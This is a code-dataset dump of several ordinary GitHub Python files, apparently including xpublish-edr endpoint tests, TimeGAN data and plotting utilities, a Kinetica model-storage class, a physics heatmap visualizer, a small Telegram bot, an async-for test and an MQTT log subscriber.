cf_dataset[\"air\"].attrs[\"long_name\"]\n ), \"DataArray long_name should be set as parameter observed property\"\n assert (\n air_param[\"description\"][\"en\"] == cf_dataset[\"air\"].attrs[\"long_name\"]\n ), \"DataArray long_name should be set as parameter description\"\n\n air_range = data[\"ranges\"][\"air\"]\n\n assert air_range[\"type\"] == \"NdArray\", \"Response range should be a NdArray\"\n assert air_range[\"dataType\"] == \"float\", \"Air dataType should be floats\"\n assert air_range[\"axisNames\"] == [\"t\"], \"Time should be the only remaining axes\"\n assert len(air_range[\"shape\"]) == 1, \"There should only one axes\"\n assert air_range[\"shape\"][0] == len(axes[\"t\"][\"values\"]), \"The shape of the \"\n assert (\n len(air_range[\"values\"]) == 4\n ), \"There should be 4 values, one for each time step\"\n\n\ndef test_cf_position_csv(cf_client):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x} {y})&f=csv\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n assert (\n \"text/csv\" in response.headers[\"content-type\"]\n ), \"The content type should be set as a CSV\"\n assert (\n \"attachment\" in response.headers[\"content-disposition\"]\n ), \"The response should be set as an attachment to trigger download\"\n assert (\n \"position.csv\" in response.headers[\"content-disposition\"]\n ), \"The file name should be position.csv\"\n\n csv_data = [\n line.split(\",\") for line in response.content.decode(\"utf-8\").splitlines()\n ]\n\n assert (\n len(csv_data) == 5\n ), \"There should be 4 data rows (one for each time step), and one header row\"\n for key in (\"time\", \"lat\", \"lon\", \"air\", \"cell_area\"):\n assert key in csv_data[0], f\"column {key} should be in the header\"\n\n\ndef test_cf_position_nc(cf_client):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x} {y})&f=nc\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n assert (\n \"application/netcdf\" in response.headers[\"content-type\"]\n ), \"The content type should be set as a NetCDF\"\n assert (\n \"attachment\" in response.headers[\"content-disposition\"]\n ), \"The response should be set as an attachment to trigger download\"\n assert (\n \"position.nc\" in response.headers[\"content-disposition\"]\n ), \"The file name should be position.nc\"\n\n\ndef test_percent_encoded_cf_position_nc(cf_client):\n x = 204\n y = 44\n response = cf_client.get(f\"/datasets/air/edr/position?coords=POINT({x}%20{y})&f=nc\")\n\n assert response.status_code == 200, \"Response did not return successfully\"\n assert (\n \"application/netcdf\" in response.headers[\"content-type\"]\n ), \"The content type should be set as a NetCDF\"\n assert (\n \"attachment\" in response.headers[\"content-disposition\"]\n ), \"The response should be set as an attachment to trigger download\"\n assert (\n \"position.nc\" in response.headers[\"content-disposition\"]\n ), \"The file name should be position.nc\"\n","repo_name":"xpublish-community/xpublish-edr","sub_path":"tests/test_cf_router.py","file_name":"test_cf_router.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"28401639479","text":"import numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport umap\n\n\nclass minmaxscaler:\n def __init__(self):\n self.matrix_min = None\n self.matrix_max = None\n self.denom = None\n\n def fit(self, X):\n self.matrix_min = X.min(axis=1, keepdims=True).values\n self.matrix_max = X.max(axis=1, keepdims=True).values\n self.denom = self.matrix_max - self.matrix_min\n\n def fit_transform(self, X):\n self.fit(X)\n return self.transform(X)\n\n def transform(self, X):\n return (X - self.matrix_min) / self.denom\n\n def inverse_transform(self, X):\n return X * self.denom + self.matrix_min\n\n\ndef create_sin3(sin1, sin2, alpha, noise):\n seq_len = len(sin1)\n importance = np.array([alpha ** i for i in range(seq_len)])\n\n if alpha < 1:\n sin3 = []\n for i in range(1, seq_len + 1):\n sin3.append(((importance[:i][::-1] * sin1[:i] + importance[:i][::-1] * sin2[:i]) / 2).sum())\n sin3 = np.array(sin3)\n else:\n sin3 = (sin1 + sin2) / 2\n\n #if noise > 0:\n # sin3 = np.array(sin3) + np.random.normal(0, noise, seq_len)\n\n return sin3\n\n\ndef sine_data_generation(no, seq_len, alpha, noise, s1_freq, s2_freq, s1_phase, s2_phase):\n \"\"\"Sine data generation.\n\n Args:\n - no: the number of samples\n - seq_len: sequence length of the time-series\n - dim: feature dimensions\n - temporal: whether to add temporal information\n\n Returns:\n - data: generated data\n \"\"\"\n # Initialize the output\n data = list()\n # Generate sine data\n for i in range(no):\n # Initialize each time-series\n\n t = np.linspace(0, 2*np.pi, seq_len)\n #t = np.arange(seq_len)\n # Randomly drawn frequency and phase\n\n freq1 = np.random.uniform(s1_freq[0], s1_freq[1])\n phase1 = np.random.uniform(s1_phase[0], s1_phase[1])\n sin1 = np.sin(t * freq1 + phase1)\n\n freq2 = np.random.uniform(s2_freq[0], s2_freq[1])\n phase2 = np.random.uniform(s2_phase[0], s2_phase[1])\n sin2 = np.sin(t * freq2 + phase2)\n\n if noise > 0:\n sin1 = sin1 + np.random.normal(0, noise, seq_len)\n sin2 = sin2 + np.random.normal(0, noise, seq_len)\n\n sin3 = create_sin3(sin1, sin2, alpha=alpha, noise=noise)\n sinuses = np.array([sin1, sin2, sin3])\n # Align row/column\n temp = torch.tensor(sinuses).transpose(0, 1)\n # Normalize to [0,1]\n # temp = (temp + 1) * 0.5\n # Stack the generated data\n data.append(temp)\n\n return torch.stack(data)\n\n\nclass DatasetSinus(torch.utils.data.Dataset):\n \"\"\"TimeGAN Dataset for sampling data with their respective time\n Args:\n - data (numpy.ndarray): the padded dataset to be fitted (D x S x F)\n - time (numpy.ndarray): the length of each data (D)\n Parameters:\n - x (torch.FloatTensor): the real value features of the data\n - t (torch.LongTensor): the temporal feature of the data\n \"\"\"\n\n def __init__(self, num, seq_len, alpha, noise, s1_freq=None, s2_freq=None, s1_phase=None, s2_phase=None):\n \"\"\"Initialize the dataset\n Optinal args:\n s1_freq, s2_freq, s1_phase, s2_phase: list of two floats, [min, max]\n \"\"\"\n # standard sine waves\n if s1_freq is None:\n s1_freq = [1, 3]\n #s1_freq = [0.05, 0.15]\n if s2_freq is None:\n s2_freq = [4, 6]\n #s2_freq = [0.3, 0.4]\n if s1_phase is None:\n s1_phase = [-np.pi/2, 0]\n #s1_phase = [-np.pi / 2, 0]\n if s2_phase is None:\n s2_phase = [0, np.pi/2]\n #s2_phase = [0, np.pi / 2]\n\n print(f\"sin1 freq:{s1_freq}, phase:{s1_phase}\")\n print(f\"sin2 freq:{s2_freq}, phase:{s2_phase}\")\n\n\n self.X_raw = sine_data_generation(num, seq_len, alpha, noise,\n s1_freq, s2_freq, s1_phase, s2_phase)\n self.X_scaler = minmaxscaler()\n self.X = self.X_scaler.fit_transform(self.X_raw)\n # self.X = torch.tensor(sine_data_generation(num, seq_len, features, temporal=temporal),\n # dtype=torch.float32).clone().detach_()\n self.T = [x.size(0) for x in self.X]\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, idx):\n return self.X[idx].float(), self.T[idx]\n\n def collate_fn(self, batch):\n \"\"\"Minibatch sampling\n \"\"\"\n # Pad sequences to max length\n X_mb = [X for X in batch[0]]\n\n # The actual length of each data\n T_mb = [T for T in batch[1]]\n\n return X_mb, T_mb\n\n\nclass DatasetStocks(torch.utils.data.Dataset):\n \"\"\"TimeGAN Dataset for sampling data with their respective time\n Args:\n - data (numpy.ndarray): the padded dataset to be fitted (D x S x F)\n - time (numpy.ndarray): the length of each data (D)\n Parameters:\n - x (torch.FloatTensor): the real value features of the data\n - t (torch.LongTensor): the temporal feature of the data\n \"\"\"\n\n def __init__(self, data):\n # sanity check\n self.X = data\n self.T = [x.size(0) for x in self.X]\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, idx):\n return self.X[idx].float(), self.T[idx]\n\n def collate_fn(self, batch):\n \"\"\"Minibatch sampling\n \"\"\"\n # Pad sequences to max length\n X_mb = [X for X in batch[0]]\n\n # The actual length of each data\n T_mb = [T for T in batch[1]]\n\n return X_mb, T_mb\n\n\n#######################################################################\n# Visualization\n\n# Commented out IPython magic to ensure Python compatibility.\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\n\n\ndef visualization(ori_data, generated_data, analysis):\n \"\"\"Using PCA or tSNE for generated and original data visualization.\n\n Args:\n - ori_data: original data\n - generated_data: generated synthetic data\n - analysis: tsne or pca\n \"\"\"\n # Analysis sample size (for faster computation)\n anal_sample_no = min([1000, len(ori_data)])\n idx = np.random.permutation(len(ori_data))[:anal_sample_no]\n\n # Data preprocessing\n ori_data = np.asarray(ori_data)\n generated_data = np.asarray(generated_data)\n\n ori_data = ori_data[idx]\n generated_data = generated_data[idx]\n\n no, seq_len, dim = ori_data.shape\n\n for i in range(anal_sample_no):\n if (i == 0):\n prep_data = np.reshape(np.mean(ori_data[0, :, :], 1), [1, seq_len])\n prep_data_hat = np.reshape(np.mean(generated_data[0, :, :], 1), [1, seq_len])\n else:\n prep_data = np.concatenate((prep_data,\n np.reshape(np.mean(ori_data[i, :, :], 1), [1, seq_len])))\n prep_data_hat = np.concatenate((prep_data_hat,\n np.reshape(np.mean(generated_data[i, :, :], 1), [1, seq_len])))\n\n # Visualization parameter\n colors = [\"tab:blue\" for i in range(anal_sample_no)] + [\"tab:orange\" for i in range(anal_sample_no)]\n\n if analysis == 'pca':\n # PCA Analysis\n pca = PCA(n_components=2)\n pca.fit(prep_data)\n pca_results = pca.transform(prep_data)\n pca_hat_results = pca.transform(prep_data_hat)\n\n # Plotting\n f, ax = plt.subplots(1)\n plt.scatter(pca_results[:, 0], pca_results[:, 1],\n c=colors[:anal_sample_no], alpha=0.2, label=\"Original\")\n plt.scatter(pca_hat_results[:, 0], pca_hat_results[:, 1],\n c=colors[anal_sample_no:], alpha=0.2, label=\"Synthetic\")\n\n ax.legend()\n plt.title('PCA plot')\n plt.xlabel('x-pca')\n plt.ylabel('y_pca')\n # plt.show()\n return f\n\n elif analysis == 'tsne':\n\n # Do t-SNE Analysis together\n prep_data_final = np.concatenate((prep_data, prep_data_hat), axis=0)\n\n # TSNE anlaysis\n tsne = TSNE(n_components=2, verbose=0, perplexity=40, n_iter=300)\n tsne_results = tsne.fit_transform(prep_data_final)\n\n # Plotting\n f, ax = plt.subplots(1)\n\n plt.scatter(tsne_results[:anal_sample_no, 0], tsne_results[:anal_sample_no, 1],\n c=colors[:anal_sample_no], alpha=0.2, label=\"Original\")\n plt.scatter(tsne_results[anal_sample_no:, 0], tsne_results[anal_sample_no:, 1],\n c=colors[anal_sample_no:], alpha=0.2, label=\"Synthetic\")\n\n ax.legend()\n\n plt.title('t-SNE plot')\n plt.xlabel('x-tsne')\n plt.ylabel('y_tsne')\n # plt.show()\n return f\n elif analysis == 'umap':\n\n prep_data_final = np.concatenate((prep_data, prep_data_hat), axis=0)\n reducer = umap.UMAP()\n embedding = reducer.fit_transform(prep_data_final)\n f, ax = plt.subplots(1)\n\n plt.scatter(embedding[:anal_sample_no, 0], embedding[:anal_sample_no, 1],\n c=colors[:anal_sample_no], alpha=0.2, label=\"Original\")\n plt.scatter(embedding[anal_sample_no:, 0], embedding[anal_sample_no:, 1],\n c=colors[anal_sample_no:], alpha=0.2, label=\"Synthetic\")\n\n ax.legend()\n\n plt.title('UMAP plot')\n plt.xlabel('x-umap')\n plt.ylabel('y_umap')\n # plt.show()\n return f\n\n\ndef modeCollapseEvaluator(ori_data, generated_data):\n # Analysis sample size (for faster computation)\n anal_sample_no = min([1000, len(ori_data)])\n idx = np.random.permutation(len(ori_data))[:anal_sample_no]\n\n # Data preprocessing\n ori_data = np.asarray(ori_data)\n generated_data = np.asarray(generated_data)\n\n ori_data = ori_data[idx]\n generated_data = generated_data[idx]\n\n no, seq_len, dim = ori_data.shape\n\n for i in range(anal_sample_no):\n if (i == 0):\n prep_data = np.reshape(np.mean(ori_data[0, :, :], 1), [1, seq_len])\n prep_data_hat = np.reshape(np.mean(generated_data[0, :, :], 1), [1, seq_len])\n else:\n prep_data = np.concatenate((prep_data,\n np.reshape(np.mean(ori_data[i, :, :], 1), [1, seq_len])))\n prep_data_hat = np.concatenate((prep_data_hat,\n np.reshape(np.mean(generated_data[i, :, :], 1), [1, seq_len])))\n\n # PCA Analysis\n pca = PCA(n_components=2)\n pca.fit(prep_data)\n pca_results = pca.transform(prep_data)\n pca_hat_results = pca.transform(prep_data_hat)\n\n real_std = pca_results.std(axis=0)\n fake_std = pca_hat_results.std(axis=0)\n print(\"Real std: \", real_std)\n print(\"Fake std: \", fake_std)\n if np.mean(real_std / fake_std) < 1.5:\n return False\n else:\n return True\n\n\ndef log_visualizations(dataset, genereted_data, run):\n \"\"\"Logging visualization results\"\"\"\n r = np.array([data[0].numpy() for data in dataset])\n f_pca = visualization(r, genereted_data, 'pca')\n run[\"PCA\"].upload(f_pca)\n plt.close(f_pca)\n\n f_tsne = visualization(r, genereted_data, 'tsne')\n run[\"tsne\"].upload(f_tsne)\n plt.close(f_tsne)\n\n f_umap = visualization(r, genereted_data, 'umap')\n run[\"umap\"].upload(f_umap)\n plt.close(f_umap)\n\n run[\"mode_collapse\"] = modeCollapseEvaluator(r, genereted_data)\n\n\ndef google_data_loading(seq_length):\n def MinMaxScaler(data):\n numerator = data - np.min(data, 0)\n denominator = np.max(data, 0) - np.min(data, 0)\n return numerator / (denominator + 1e-7)\n\n x = np.loadtxt('datasets/GOOGLE_BIG.csv', delimiter=\",\", skiprows=1)[::-1]\n # x = torch.tensor(x.copy())\n x = MinMaxScaler(x)\n\n # Build dataset\n dataX = []\n\n # Cut data by sequence length\n for i in range(0, len(x) - seq_length):\n _x = x[i:i + seq_length]\n dataX.append(_x)\n\n # Mix Data (to make it similar to i.i.d)\n idx = np.random.permutation(len(dataX))\n\n outputX = []\n for i in range(len(dataX)):\n outputX.append(dataX[idx[i]])\n\n return torch.tensor(outputX)\n\n\ndef restore_weights(model, run):\n run[\"model_checkpoint\"].download(destination=\"models/\")\n model.load_state_dict(torch.load(\"models/model_checkpoint.pt\", map_location=\"cpu\"))\n run.stop()\n return model\n\n\n","repo_name":"Kohmann/master-GAN","sub_path":"TimeGAN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12259,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"40096277107","text":"import gpudb\nimport os\nimport collections\n\nKDBC = gpudb.GPUdb(encoding='BINARY', host='127.0.0.1', port='9191')\n\nclass KModelIO(object):\n def __init__(self,h_db=KDBC):\n self.h_db=h_db\n self.file_type = \"\"\"\n {\n \"type\": \"record\",\n \"name\": \"file_type\",\n \"fields\": [\n {\"name\":\"model_binary\",\"type\":\"bytes\"},\n {\"name\":\"model\",\"type\":\"string\"},\n {\"name\":\"model_id\",\"type\":\"string\"},\n {\"name\":\"Accuracy\",\"type\":\"double\"},\n {\"name\":\"Data_Time_created\",\"type\":\"string\"}\n ]\n }\"\"\".replace('\\n', '').replace(' ', '')\n self.type_properties = {\"model_id\": [\"char64\"], \"Data_Time_created\": [\"datetime\"]}\n \n \n def Model2Kinetica(self,pbfile=None,sess=None,graph=None,output_node_names=None,ModelName=\"Model\",Loss=0.99, COLLECTION=\"Network\"):\n \"\"\"\n pbfile can be a path to a local file or a pickle bytes.\n \"\"\"\n import uuid\n from time import gmtime, strftime\n datetime = strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())\n from tensorflow import graph_util\n h_db = self.h_db\n\n # create model table if not exist\n table = 'TFmodel'\n type_def=self.file_type\n if not h_db.has_table(table_name=table)['table_exists']:\n response = h_db.create_type(type_definition=type_def,\n label=table, properties=self.type_properties)\n h_db.create_table(table_name=table, type_id=response['type_id'],\n options={\"collection_name\": COLLECTION})\n\n # generate output binary string\n # output_node_names example,output_node_names = \"input,output,output2\"\n #print \"works 1\"\n if pbfile !=None:\n if len(pbfile)<256:\n model=open(pbfile,'rb').read()\n else:\n model=pbfile\n #print \"works 2\"\n else:\n output_graph_def = graph_util.convert_variables_to_constants(\n sess, # The session is used to retrieve the weights\n graph.as_graph_def(),\n output_node_names.split(\",\") # The output node names are used to select the usefull nodes\n )\n model=output_graph_def.SerializeToString()\n # insert model into kinetica\n encoded_obj_list = []\n ID = str(uuid.uuid1())\n datum = collections.OrderedDict()\n datum[\"model_binary\"] = model\n datum[\"model\"] = ModelName\n datum[\"model_id\"] = ID\n datum[\"Accuracy\"] = Loss\n datum[\"Data_Time_created\"] = datetime\n encoded_obj_list.append(h_db.encode_datum(self.file_type, datum))\n options = {'update_on_existing_pk': 'true'}\n response = h_db.insert_records(table_name=table, data=encoded_obj_list, list_encoding='binary', options=options)\n return ID\n \n\n def Model_from_Kinetica(self,Model_ID):\n from tensorflow import GraphDef,Graph,import_graph_def\n h_db = self.h_db\n response = h_db.get_records(table_name='TFmodel', encoding=\"binary\",\n options={'expression': \"model_id=\\\"\" + Model_ID + \"\\\"\"})\n records = gpudb.GPUdbRecord.decode_binary_data(response[\"type_schema\"], response[\"records_binary\"])\n record=records[0]\n record[\"model_binary\"]\n graph_def = GraphDef()\n graph_def.ParseFromString(record[\"model_binary\"])\n\n graph = Graph()\n with graph.as_default():\n # The name var will prefix every op/nodes in your graph\n # Since we load everything in a new graph, this is not needed\n import_graph_def(graph_def)\n return graph\n \n \n def SkModel_from_Kinetica(self,Model_ID):\n #from tensorflow import GraphDef,Graph,import_graph_def\n response = self.h_db.get_records(table_name='TFmodel', encoding=\"binary\",\n options={'expression': \"model_id=\\\"\" + Model_ID + \"\\\"\"})\n records = gpudb.GPUdbRecord.decode_binary_data(response[\"type_schema\"], response[\"records_binary\"])\n return records[0][\"model_binary\"]\n \n\n def getData(self, table='Mnist_train', offset=0, numberData=1):\n h_db=self.h_db\n response = h_db.get_records(table_name=table, offset=offset, limit=numberData)\n res_decoded = gpudb.GPUdbRecord.decode_binary_data(response[\"type_schema\"], response[\"records_binary\"])\n return res_decoded\n","repo_name":"kineticadb/kinetica-jupyterlab","sub_path":"notebooks/KJIO/kmodel_io.py","file_name":"kmodel_io.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17963879780","text":"\"\"\"可视化计算的结果\"\"\"\n\n\nimport argparse\nimport numpy\nfrom helpers.drawer import draw_heatmap, draw_points\nfrom basics import Point\nfrom fermi.stripesquare import inverse_uval, set_stripe, set_potential\nfrom fermi.stripesquare import get_s_band_patches, get_p_band_patches\n\n\ndef draw_single_channel(args):\n '''绘制单通道的图片结果'''\n rpath = 'heatmap6/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n #\n c2i = {'s': [0], 'p': [1], '?': [0, 1]}\n i2c = {0: 's', 1: 'p'}\n candi = [c2i[bdi] for bdi in args.channel]\n dims = [len(bdi) for bdi in candi]\n place_holder = numpy.ndarray(dims)\n ndit = numpy.nditer(place_holder, flags=['multi_index'])\n while not ndit.finished:\n idx1, idx2, idx3, idx4 = ndit.multi_index\n bd1 = candi[0][idx1]\n bd2 = candi[1][idx2]\n bd3 = candi[2][idx3]\n bd4 = candi[3][idx4]\n print(bd1, bd2, bd3, bd4, '\\t', i2c[bd1], i2c[bd2], i2c[bd3], i2c[bd4])\n draw_heatmap(\n uval[bd1, bd2, bd3, bd4, :, :, args.n3idx],\n save='show'\n )\n ndit.iternext()\n\n\ndef draw_mixed_channel(args):\n '''绘制通道混合在一起的结果'''\n rpath = 'heatmap6/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n #按照逆时针顺序来给带排序\n shape = numpy.shape(uval)\n bnum, pnum = shape[0], shape[4]\n ppnum = pnum // 4\n idxpairs = []\n #s带左上\n for idx in range(ppnum):\n idxpairs.append((0, 3*ppnum + idx))\n #p带右上\n for idx in range(ppnum):\n idxpairs.append((1, 2*ppnum + idx))\n #p带左上\n for idx in range(ppnum):\n idxpairs.append((1, 3*ppnum + idx))\n #s带右上\n for idx in range(ppnum):\n idxpairs.append((0, idx))\n #s带右下\n for idx in range(ppnum):\n idxpairs.append((0, ppnum + idx))\n #p带左下\n for idx in range(ppnum):\n idxpairs.append((1, idx))\n #p带右下\n for idx in range(ppnum):\n idxpairs.append((1, ppnum + idx))\n #s带左下\n for idx in range(ppnum):\n idxpairs.append((1, 2*ppnum + idx))\n #整理图片\n #print(idxpairs)\n totpnum = len(idxpairs)\n heatmap = numpy.ndarray((totpnum, totpnum))\n idx3pair = idxpairs[args.n3idx]\n for chn in args.channel:\n if chn == 's':\n bd4 = 0\n elif chn == 'p':\n bd4 = 1\n else:\n raise ValueError('bd4不对')\n for hid1, pr1 in enumerate(idxpairs, 0):\n for hid2, pr2 in enumerate(idxpairs, 0):\n bd1, idx1 = pr1\n bd2, idx2 = pr2\n bd3, idx3 = idx3pair[0], idx3pair[1]\n heatmap[hid1, hid2] = uval[bd1, bd2, bd3, bd4, idx1, idx2, idx3]\n draw_heatmap(heatmap)\n\n\ndef draw_count_channel(args):\n '''绘制通道混合在一起的结果'''\n rpath = 'heatmap6/U2/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n #uval2 = numpy.load('{0}/{1:.2f}U.npz'.format(rpath, args.lval))\n #print(numpy.allclose(uval, uval2))\n #按照逆时针顺序来给带排序\n shape = numpy.shape(uval)\n bnum, pnum = shape[0], shape[4]\n ppnum = pnum // 4\n idxpairs = []\n #s带左上\n for idx in range(ppnum):\n idxpairs.append((0, 3*ppnum + idx))\n #p带右上\n for idx in range(ppnum):\n idxpairs.append((1, 2*ppnum + idx))\n #p带左上\n for idx in range(ppnum):\n idxpairs.append((1, 3*ppnum + idx))\n #s带右上\n for idx in range(ppnum):\n idxpairs.append((0, idx))\n #s带右下\n for idx in range(ppnum):\n idxpairs.append((0, ppnum + idx))\n #p带左下\n for idx in range(ppnum):\n idxpairs.append((1, idx))\n #p带右下\n for idx in range(ppnum):\n idxpairs.append((1, ppnum + idx))\n #s带左下\n for idx in range(ppnum):\n idxpairs.append((1, 2*ppnum + idx))\n #整理图片\n #print(idxpairs)\n totpnum = len(idxpairs)\n heatmap = numpy.ndarray((totpnum, totpnum))\n idx3pair = idxpairs[args.n3idx]\n for chn in args.channel:\n for hid1, pr1 in enumerate(idxpairs, 0):\n for hid2, pr2 in enumerate(idxpairs, 0):\n bd1, idx1 = pr1\n bd2, idx2 = pr2\n bd3, idx3 = idx3pair[0], idx3pair[1]\n bdsum = bd1 + bd2 + bd3\n #这种代表需要有偶数个p\n if chn == 'e':\n #如果已经有偶数个p,则加一个s\n bd4 = 0 if bdsum % 2 == 0 else 1\n #这种代表有奇数个p\n elif chn == 'o':\n #如果已经有偶数个p,则加一个p\n bd4 = 1 if bdsum % 2 == 0 else 0\n else:\n raise ValueError('bd4不对')\n heatmap[hid1, hid2] = uval[bd1, bd2, bd3, bd4, idx1, idx2, idx3]\n draw_heatmap(heatmap)\n\n\ndef draw_basis_channel(args):\n '''在子格子的表示上显示'''\n rpath = 'heatmap6/s{:.2f}nu{:.2f}'.format(args.stripe, args.dope)\n uval = numpy.load('{0}/{1:.2f}U.npy'.format(rpath, args.lval))\n #找到动量空间中的几个代表点\n upatches = numpy.ndarray(32, dtype=Point)\n #anggap = numpy.pi / 2 / 8\n #for idx in range(8):\n # tanv = numpy.tan((idx + 0.5)*anggap)\n # yval = numpy.pi * (tanv) / (1 + tanv)\n # xval = yval / tanv\n # upatches[idx] = Point(xval, yval, 1)\n # upatches[8 + idx] = Point(-yval, xval, 1)\n # upatches[16 + idx] = Point(-xval, -yval, 1)\n # upatches[24 + idx] = Point(xval, -yval, 1)\n #draw_points(upatches)\n set_stripe(0.)\n set_potential(0.)\n upatches[:16] = get_s_band_patches(16)\n upatches[16:] = get_p_band_patches(16)\n draw_points(upatches)\n #上面设置stripe和potential为0目的是得到相应的点\n #现在要设置回来,因为后面反变换回来的时候需要find_patch\n set_stripe(args.stripe)\n set_potential(args.dope)\n #\n spats = get_s_band_patches(16)\n ppats = get_p_band_patches(16)\n ubas, iubas = inverse_uval(upatches, spats, ppats, uval)\n #\n draw_heatmap(ubas[0, 0, 0, 0, :, :, 4])\n draw_heatmap(ubas[0, 1, 1, 0, :, :, 4])\n draw_heatmap(ubas[1, 0, 0, 1, :, :, 4])\n draw_heatmap(ubas[1, 1, 1, 1, :, :, 4])\n #c2i = {'s': [0], 'p': [1], '?': [0, 1]}\n #i2c = {0: 's', 1: 'p'}\n #candi = [c2i[bdi] for bdi in args.channel]\n #dims = [len(bdi) for bdi in candi]\n #place_holder = numpy.ndarray(dims)\n #ndit = numpy.nditer(place_holder, flags=['multi_index'])\n\ndef main():\n '''入口'''\n parser = argparse.ArgumentParser(\n prog='python3 visualize.py',\n description='visualize U'\n )\n parser.add_argument('-m', '--mode', type=str, required=True, help='drawing mode')\n parser.add_argument('-s', '--stripe', type=float, required=True, help='stripe strength')\n parser.add_argument('-d', '--dope', type=float, required=True, help='hole dope')\n parser.add_argument('-l', '--lval', type=float, required=True, help='lval')\n parser.add_argument('-c', '--channel', type=str, required=True, help='which band')\n parser.add_argument('-n', '--n3idx', type=int, help='require if single mode')\n parser.add_argument('--prefix', type=str,\\\n default='scripts/stripe/str', help='saved file prefix')\n args = parser.parse_args()\n #\n mode_dict = {\n 'single': draw_single_channel,\n 'mixed': draw_mixed_channel,\n 'count': draw_count_channel,\n 'basis': draw_basis_channel\n }\n mode_dict[args.mode](args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"maryprimary/frg","sub_path":"scripts/stripe/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5479982609","text":"# test waiting within \"async for\" __anext__ function\n\n# uPy allows normal generators to be awaitables.\n# CircuitPython does not.\n# In CircuitPython you need to have an __await__ method on an awaitable like in CPython;\n# and like in CPython, generators do not have __await__.\n\nclass Awaitable:\n def __init__(self, x):\n self.x = x\n\n def __await__(self):\n print('f start:', self.x)\n yield self.x + 1\n yield self.x + 2\n return self.x + 3\n\nclass ARange:\n def __init__(self, high):\n print('init')\n self.cur = 0\n self.high = high\n\n def __aiter__(self):\n print('aiter')\n return self\n\n async def __anext__(self):\n print('anext')\n print('f returned:', await Awaitable(20))\n if self.cur < self.high:\n val = self.cur\n self.cur += 1\n return val\n else:\n raise StopAsyncIteration\n\nasync def coro():\n async for x in ARange(4):\n print('x', x)\n\no = coro()\ntry:\n while True:\n print('coro yielded:', o.send(None))\nexcept StopIteration:\n print('finished')\n","repo_name":"KMKfw/kmkpython","sub_path":"tests/basics/async_for2.py","file_name":"async_for2.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"1392446999","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 5 06:09:55 2018\n\n@author: User\n\"\"\"\nx=[1,2,3,4,5,6,7,8,9,0,1,2,3]\nstart=4\nprint(len(x))\nprint()\nend=12\nt=9\ndelta=end-start\nfor i in range(end,start-1,-1):\n print (x[i],' ',i)\nfor w in range(0,5,1):\n t-=1\n print(t/100)","repo_name":"JeffHabe/PythonWorkspace","sub_path":"For LOOP.py","file_name":"For LOOP.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37511625580","text":"import telebot\nimport Compres\n\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=['start'])\ndef welcom(message):\n send_mess = f' Привет {message.from_user.first_name}, как оно?'\n bot.send_message(message.chat.id, send_mess, parse_mode='html')\n@bot.message_handler(commands=['websait'])\ndef go_web(message):\n marc = telebot.types.InlineKeyboardMarkup()\n marc.add(telebot.types.InlineKeyboardButton('перейти на сайт', url='https://www.youtube.com/watch?v=QoJ_yvPttlc'))\n # marc.add(telebot.types.InlineKeyboardButton('нет не хочу'))\n send_message = f'Отлично, вперед!'\n bot.send_message(message.chat.id, send_message, parse_mode='html', reply_markup=marc)\n\n\n\n\n\n\n\n\n\n\n\n\n\nbot.polling(non_stop=True)\n","repo_name":"makaroch/semenar_py_dz","sub_path":"sem_9/main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73904030491","text":"\nimport json\n\nfrom paho.mqtt import client as mqtt_client\n\nimport bf_module.MQTT.common as MQTT\nimport bf_module.MQTT.config as CONFIG_MQTT\n\n\nTAG = \"[MQTT_DB_Service]\"\nclient_id = \"raspberry_bf\"\n\ndef on_message(client, userdata, msg:mqtt_client.MQTTMessage):\n print(f\"[{msg.topic}] : {msg.payload.decode()}\")\n\n\n\ndef subscribe(client: mqtt_client.Client):\n client.subscribe(CONFIG_MQTT.topic_all)\n client.on_message = on_message\n\n \n\ndef run():\n client = MQTT.connect_mqtt(client_id)\n subscribe(client)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n print(f\"{TAG}:init\")\n run()\n print(f\"{TAG}:end\")","repo_name":"YecidMorenoUSP/BomFuturo_RBPI4","sub_path":"bf_module/Services/MQTT_LOG_service.py","file_name":"MQTT_LOG_service.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34568227576","text":"class Series:\n \"\"\"\n Class for generic Serie\n \"\"\"\n def __init__(self, data, series_type, name=None):\n self.name = name\n self.type = series_type\n self.data = data\n\n def __str__(self):\n \"\"\"\n String representation of a Serie\n \"\"\"\n 